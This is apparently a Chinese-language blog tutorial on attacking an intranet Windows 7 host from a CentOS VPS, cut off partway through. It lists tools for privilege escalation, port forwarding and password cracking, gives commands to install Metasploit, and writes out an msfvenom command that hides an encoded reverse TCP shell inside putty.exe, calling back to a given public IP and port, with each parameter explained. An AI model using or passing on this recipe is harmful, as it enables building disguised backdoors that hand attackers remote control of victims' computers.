admin管理员组

文章数量:1637858

准备

环境:

win7:192.168.123.233
centos7:45.77.179.138(为做实验临时申请注册公网ip)
攻击:
Metasploit渗透框架
Cve-2018-8120本地提权执行文件
Windows exploit sugger(漏洞利用建议器)
Putty执行文件
Lcx (windows下端口转发工具)
Portmap (linux下端口转发工具)
Saminside (破解系统用户密码)

攻击拓扑图

vps配置攻击环境:

centos7安装metasploit

apt-get install curl,wget
curl https://raw.githubusercontent/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \
  chmod 755 msfinstall && \
  ./msfinstall
                          //成功安装后请运行下属代码,以使下载的最新版本的msf连接数据库。
adduser msf               //添加msf用户,这里会提示输入新添账号的密码
su msf                    //切换用户为msf
./msfconsole

生成木马并绑定程序(也可以用shellter给程序绑定木马,看个人习惯):

msfvenom -p windows/shell_reverse_tcp LHOST=45.77.179.138 LPORT=8001 -e x86/shikata_ga_nai -x putty.exe  -k -i 5 -f exe -o backdoor.exe
msfvenom -p windows/shell_reverse_tcp 意为使用shell_reverse_tcp攻击载荷
LHOST=45.77.179.138 此步是设置攻击者IP地址
LPORT=8001 此步是设置木马将会主动连接攻击者设定的监听端口
-e x86/shikata_ga_nai 此步意为使用shikata_ga_nai的编码方式对攻击载荷进行重新编码࿰

本文标签: 内网主机VPS